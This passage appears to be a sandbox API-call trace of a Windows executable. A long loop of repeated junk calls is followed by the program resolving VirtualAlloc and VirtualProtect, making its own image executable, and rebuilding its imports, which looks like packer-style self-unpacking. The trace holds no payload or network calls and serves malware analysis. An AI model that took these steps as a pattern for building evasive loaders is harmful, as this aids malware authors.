(hChangeHandle=0x0) returned 0 [0044.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.829] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.830] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.830] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.830] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.830] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.830] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.830] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.830] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.830] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.830] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.830] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.830] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.830] AddAtomA (lpString=0x0) returned 0x0 [0044.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.831] AddAtomA (lpString=0x0) returned 0x0 [0044.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.832] AddAtomA (lpString=0x0) returned 0x0 [0044.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.832] AddAtomA (lpString=0x0) returned 0x0 [0044.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.832] AddAtomA (lpString=0x0) returned 0x0 [0044.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.832] AddAtomA (lpString=0x0) returned 0x0 [0044.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.832] AddAtomA (lpString=0x0) returned 0x0 [0044.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.832] AddAtomA (lpString=0x0) returned 0x0 [0044.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.832] AddAtomA (lpString=0x0) returned 0x0 [0044.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.832] AddAtomA (lpString=0x0) returned 0x0 [0044.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.832] AddAtomA (lpString=0x0) returned 0x0 [0044.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.832] AddAtomA (lpString=0x0) returned 0x0 [0044.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.832] AddAtomA (lpString=0x0) returned 0x0 [0044.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.832] AddAtomA (lpString=0x0) returned 0x0 [0044.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.833] AddAtomA (lpString=0x0) returned 0x0 [0044.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.834] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.835] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.835] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.835] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.835] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.835] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.835] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.835] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.835] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.835] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.835] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.835] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.835] AddAtomA (lpString=0x0) returned 0x0 [0044.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.836] AddAtomA (lpString=0x0) returned 0x0 [0044.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.836] AddAtomA (lpString=0x0) returned 0x0 [0044.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.836] AddAtomA (lpString=0x0) returned 0x0 [0044.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.836] AddAtomA (lpString=0x0) returned 0x0 [0044.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.836] AddAtomA (lpString=0x0) returned 0x0 [0044.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.836] AddAtomA (lpString=0x0) returned 0x0 [0044.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.836] AddAtomA (lpString=0x0) returned 0x0 [0044.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.836] AddAtomA (lpString=0x0) returned 0x0 [0044.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.836] AddAtomA (lpString=0x0) returned 0x0 [0044.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.878] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0044.878] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0044.878] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0044.878] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0044.879] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0044.879] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0044.879] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0044.879] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00 [0044.879] SetErrorMode (uMode=0x400) returned 0x0 [0044.879] SetErrorMode (uMode=0x0) returned 0x400 [0044.879] GetVersionExA (in: lpVersionInformation=0x18d520*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}\x16w") | out: lpVersionInformation=0x18d520*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0044.879] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x2c0000 [0044.881] VirtualProtect (in: lpAddress=0x400000, dwSize=0x23000, flNewProtect=0x40, lpflOldProtect=0x18e5a8 | out: lpflOldProtect=0x18e5a8*=0x2) returned 1 [0045.114] VirtualFree (lpAddress=0x2c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.115] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000 [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="FlushFileBuffers") returned 0x76c3469b [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringW") returned 0x76c317b9 [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleCP") returned 0x76cd7bff [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="GetStringTypeW") returned 0x76c31946 [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileType") returned 0x76c33531 [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="SetStdHandle") returned 0x76cb454f [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="FreeEnvironmentStringsW") returned 0x76c351cb [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentStringsW") returned 0x76c351e3 [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0045.115] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineA") returned 0x76c351a1 [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="GetCPInfo") returned 0x76c35189 [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="GetOEMCP") returned 0x76c5d1a1 [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidCodePage") returned 0x76c34493 [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleMode") returned 0x76c31328 [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="WriteConsoleW") returned 0x76c57aca [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThread") returned 0x76c334d5 [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="UnhandledExceptionFilter") returned 0x76c5772f [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="SetUnhandledExceptionFilter") returned 0x76c387c9 [0045.116] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0045.117] GetProcAddress (hModule=0x76c20000, 